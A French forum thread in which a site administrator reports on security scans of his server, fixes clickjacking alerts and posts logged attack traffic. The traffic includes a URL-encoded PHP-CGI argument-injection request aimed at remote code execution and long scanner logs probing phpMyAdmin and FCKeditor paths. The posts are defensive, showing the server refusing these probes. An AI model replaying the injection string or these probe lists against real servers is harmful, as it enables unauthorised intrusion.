Sécurité

Donnez-nous des idées pour améliorer le forum. Evoquez les problèmes que vous rencontrez.
Avatar de l’utilisateur
EricSimon
Merle chanteur
Messages : 87
Inscription : 07 mai 2016, 12:16

Re: Tests de sécurité de 9h30 à 11h

Message par EricSimon »

OK Scotty !
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Tests de sécurité de 9h30 à 11h

Message par Montparnasse »

Pas de vulnérabilités supplémentaires depuis la dernière fois.

Ports scan : 0

Host discovery : 0

Web application tests : 1 (low) 3 (medium)

Pour l'alerte "low", je ne peux rien faire, c'est le fonctionnement normal de la base de données. Je pense plutôt à un "faux positif".

Pour les alertes "medium" : la première ne présente pas de risque, aucune donnée sensible n'est accessible. La deuxième est réglée par l'utilisation d'une en-tête fournie par le serveur pour toutes les pages du site (blocage du Clickjacking), la troisième concerne une page de manuel du serveur qui divulguerait le chemin vers son fichier (aucune donnée sensible évidemment). Un faux positif ? Dans le doute, j'ai bloqué l'accès à cette page.

Je relance le "Web application tests" vers 13h pour constater le résultat de mes modifs.
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Tests de sécurité de 9h30 à 11h

Message par Montparnasse »

Pour être franc, je me casse les dents sur le "ClickJacking". Pour les autres alertes, c'est réglé.

Je vais utiliser une autre méthode pour l'en-tête. Après je vous fiche la paix. Bon, c'est parti pour 35 min de surchauffe... ;)
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Tests de sécurité de 9h30 à 11h

Message par Montparnasse »

Bon, ça y est, j'ai eu la peau du "ClickJacking"... Voilà, comment une histoire d'en-tête HTTP peut vous pourrir une journée :]
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Sécurité

Message par Montparnasse »

Il faut avoir le coup d'œil, je vous le dis, pour débusquer la "subversion" dans les logs de Spleen ! :mrgreen: Cette fois-ci en provenance d'Ukraine, déjà connu des services de police

Image

Je ne sais pas si c'est le brexit qui me reste sur l'estomac mais je vois de moins en moins clair...

Image
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Sécurité

Message par Montparnasse »

Les hackers ne chôment pas sur Spleen depuis hier soir : 20 sources différentes pour le même type d'attaque :

Code : Tout sélectionner

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Achille renvoie indéfiniment la même réponse : « 404 », ce qui, en langage serveur, est peu courtois mais salutaire. Croisons les doigts...
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Sécurité

Message par Montparnasse »

@Tolkar

Tu es chez Proximus ? Tu utilises un matériel Apple ? J'ai ce type d'erreur quand tu te connectes sur le serveur :

Code : Tout sélectionner

GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 554 "-" "Safari/11601.6.17 CFNetwork/760.5.1 Darwin/15.5.0 (x86_64)"
GET /apple-touch-icon.png HTTP/1.1
Rien d'inquiétant mais ça le fait à chaque fois. ;)
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Sécurité

Message par Montparnasse »

Une belle tentative, ça faisait longtemps...

Code : Tout sélectionner

HEAD http://88.182.45.52:80/mysql/admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:39 +0200] "HEAD http://88.182.45.52:80/mysql/dbadmin/ HTTP/1.1" 404 224 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:40 +0200] "HEAD http://88.182.45.52:80/mysql/sqlmanager/ HTTP/1.1" 404 224 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:40 +0200] "HEAD http://88.182.45.52:80/mysql/mysqlmanager/ HTTP/1.1" 404 224 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:41 +0200] "HEAD http://88.182.45.52:80/phpmyadmin/ HTTP/1.1" 200 1496 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:41 +0200] "GET http://88.182.45.52:80/phpmyadmin/ HTTP/1.0" 200 10630 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:41 +0200] "HEAD http://88.182.45.52:80/phpMyadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:42 +0200] "HEAD http://88.182.45.52:80/phpMyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:43 +0200] "HEAD http://88.182.45.52:80/phpmyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:46 +0200] "HEAD http://88.182.45.52:80/phpmyadmin2/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:47 +0200] "HEAD http://88.182.45.52:80/phpmyadmin3/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:48 +0200] "HEAD http://88.182.45.52:80/phpmyadmin4/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:49 +0200] "HEAD http://88.182.45.52:80/2phpmyadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:49 +0200] "HEAD http://88.182.45.52:80/phpmy/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:51 +0200] "HEAD http://88.182.45.52:80/phppma/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:53 +0200] "HEAD http://88.182.45.52:80/myadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:53 +0200] "HEAD http://88.182.45.52:80/shopdb/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:55 +0200] "HEAD http://88.182.45.52:80/MyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:56 +0200] "HEAD http://88.182.45.52:80/program/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:56 +0200] "HEAD http://88.182.45.52:80/PMA/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:36:58 +0200] "HEAD http://88.182.45.52:80/dbadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:00 +0200] "HEAD http://88.182.45.52:80/pma/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:01 +0200] "HEAD http://88.182.45.52:80/db/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:01 +0200] "HEAD http://88.182.45.52:80/admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:02 +0200] "HEAD http://88.182.45.52:80/mysql/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:03 +0200] "HEAD http://88.182.45.52:80/database/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:05 +0200] "HEAD http://88.182.45.52:80/db/phpmyadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:05 +0200] "HEAD http://88.182.45.52:80/db/phpMyAdmin/ HTTP/1.1
HEAD http://88.182.45.52:80/db/phpmyadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:05 +0200] "HEAD http://88.182.45.52:80/db/phpMyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:06 +0200] "HEAD http://88.182.45.52:80/sqlmanager/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:07 +0200] "HEAD http://88.182.45.52:80/mysqlmanager/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:08 +0200] "HEAD http://88.182.45.52:80/php-myadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:09 +0200] "HEAD http://88.182.45.52:80/phpmy-admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:10 +0200] "HEAD http://88.182.45.52:80/mysqladmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:11 +0200] "HEAD http://88.182.45.52:80/mysql-admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:12 +0200] "HEAD http://88.182.45.52:80/admin/phpmyadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:13 +0200] "HEAD http://88.182.45.52:80/admin/phpMyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:14 +0200] "HEAD http://88.182.45.52:80/admin/sysadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:15 +0200] "HEAD http://88.182.45.52:80/admin/sqladmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:16 +0200] "HEAD http://88.182.45.52:80/admin/db/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:18 +0200] "HEAD http://88.182.45.52:80/admin/web/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:18 +0200] "HEAD http://88.182.45.52:80/admin/pMA/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:19 +0200] "HEAD http://88.182.45.52:80/mysql/pma/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:20 +0200] "HEAD http://88.182.45.52:80/mysql/db/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:21 +0200] "HEAD http://88.182.45.52:80/mysql/web/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:22 +0200] "HEAD http://88.182.45.52:80/mysql/pMA/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:22 +0200] "HEAD http://88.182.45.52:80/sql/phpmanager/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:25 +0200] "HEAD http://88.182.45.52:80/sql/php-myadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:26 +0200] "HEAD http://88.182.45.52:80/sql/phpmy-admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:28 +0200] "HEAD http://88.182.45.52:80/sql/sql/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:28 +0200] "HEAD http://88.182.45.52:80/sql/myadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:29 +0200] "HEAD http://88.182.45.52:80/sql/webadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:30 +0200] "HEAD http://88.182.45.52:80/sql/sqlweb/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:31 +0200] "HEAD http://88.182.45.52:80/sql/websql/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:32 +0200] "HEAD http://88.182.45.52:80/sql/webdb/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:32 +0200] "HEAD http://88.182.45.52:80/sql/sqladmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:34 +0200] "HEAD http://88.182.45.52:80/sql/sql-admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:36 +0200] "HEAD http://88.182.45.52:80/sql/phpmyadmin2/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:37 +0200] "HEAD http://88.182.45.52:80/sql/phpMyAdmin2/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:38 +0200] "HEAD http://88.182.45.52:80/sql/phpMyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:39 +0200] "HEAD http://88.182.45.52:80/db/myadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:40 +0200] "HEAD http://88.182.45.52:80/db/webadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:41 +0200] "HEAD http://88.182.45.52:80/db/dbweb/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:41 +0200] "HEAD http://88.182.45.52:80/db/websql/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:42 +0200] "HEAD http://88.182.45.52:80/db/webdb/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:43 +0200] "HEAD http://88.182.45.52:80/db/dbadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:44 +0200] "HEAD http://88.182.45.52:80/db/db-admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:45 +0200] "HEAD http://88.182.45.52:80/db/phpmyadmin3/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:45 +0200] "HEAD http://88.182.45.52:80/db/phpMyAdmin3/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:46 +0200] "HEAD http://88.182.45.52:80/db/phpMyAdmin-3/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:47 +0200] "HEAD http://88.182.45.52:80/administrator/phpmyadmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:48 +0200] "HEAD http://88.182.45.52:80/administrator/phpMyAdmin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:49 +0200] "HEAD http://88.182.45.52:80/administrator/db/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:51 +0200] "HEAD http://88.182.45.52:80/administrator/web/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:51 +0200] "HEAD http://88.182.45.52:80/administrator/pma/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:52 +0200] "HEAD http://88.182.45.52:80/administrator/PMA/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:53 +0200] "HEAD http://88.182.45.52:80/administrator/admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:54 +0200] "HEAD http://88.182.45.52:80/phpMyAdmin2/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:55 +0200] "HEAD http://88.182.45.52:80/phpMyAdmin3/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:55 +0200] "HEAD http://88.182.45.52:80/phpMyAdmin4/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:56 +0200] "HEAD http://88.182.45.52:80/phpMyAdmin-3/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:57 +0200] "HEAD http://88.182.45.52:80/php-my-admin/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:58 +0200] "HEAD http://88.182.45.52:80/PMA2012/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:37:59 +0200] "HEAD http://88.182.45.52:80/pma2012/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:38:00 +0200] "HEAD http://88.182.45.52:80/PMA2011/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:38:01 +0200] "HEAD http://88.182.45.52:80/pma2011/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
111.206.238.123 - - [17/Oct/2016:09:38:02 +0200] "HEAD http://88.182.45.52:80/phpmanager/ HTTP/1.1" 404 225 "-" "Mozilla/5.0 Jorgee"
Mais quand Thétis dit « 404 », ça veut dire « Non ». Ca vient de : Beijing, Chine.
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Avatar de l’utilisateur
romithefox
Mouette rieuse
Messages : 168
Inscription : 01 août 2016, 13:37

Re: Sécurité

Message par romithefox »

C'est du chinois pour moi !
Avatar de l’utilisateur
Montparnasse
Administrateur
Messages : 4230
Inscription : 04 janvier 2016, 18:20
Localisation : Balaruc-les-Bains (34)
Contact :

Re: Sécurité

Message par Montparnasse »

Nous avons une visite de « WebFuck » dont le nom de domaine est on ne peut plus clair ! :]

Code : Tout sélectionner

210.209.85.245 - - [16/Nov/2016:08:23:33 +0100] "GET /fckeditor HTTP/1.1" 404 531 "http://spleen.fr.nf/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:33 +0100] "GET /admin/fckeditor HTTP/1.1" 404 536 "http://spleen.fr.nf/admin/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:34 +0100] "GET /admin_manage/fckeditor HTTP/1.1" 404 543 "http://spleen.fr.nf/admin_manage/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:34 +0100] "GET /web_manage/fckeditor HTTP/1.1" 404 541 "http://spleen.fr.nf/web_manage/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:35 +0100] "GET /manager/FCKeditor HTTP/1.1" 404 538 "http://spleen.fr.nf/manager/FCKeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:38 +0100] "GET /admin/manager/Fckeditor HTTP/1.1" 404 544 "http://spleen.fr.nf/admin/manager/Fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:38 +0100] "GET /public/js/manager/fckeditor HTTP/1.1" 404 548 "http://spleen.fr.nf/public/js/manager/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:39 +0100] "GET /js/fckeditor HTTP/1.1" 404 533 "http://spleen.fr.nf/js/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:39 +0100] "GET /include/fckeditor HTTP/1.1" 404 538 "http://spleen.fr.nf/include/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:40 +0100] "GET /files/fckeditor HTTP/1.1" 404 536 "http://spleen.fr.nf/files/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:40 +0100] "GET /admin2/fckeditor HTTP/1.1" 404 537 "http://spleen.fr.nf/admin2/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:41 +0100] "GET /wp-content/plugins/fckeditor_for_wordpress/fckeditor HTTP/1.1" 404 573 "http://spleen.fr.nf/wp-content/plugins/fckeditor_for_wordpress/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
210.209.85.245 - - [16/Nov/2016:08:23:41 +0100] "GET /common/fckeditor HTTP/1.1" 404 537 "http://spleen.fr.nf/common/fckeditor" "WebFuck V2.1 T0PHackTeam www.t0p.xyz"
Quand les Shadoks sont tombés sur Terre, ils se sont cassés. C'est pour cette raison qu'ils ont commencé à pondre des œufs.
Répondre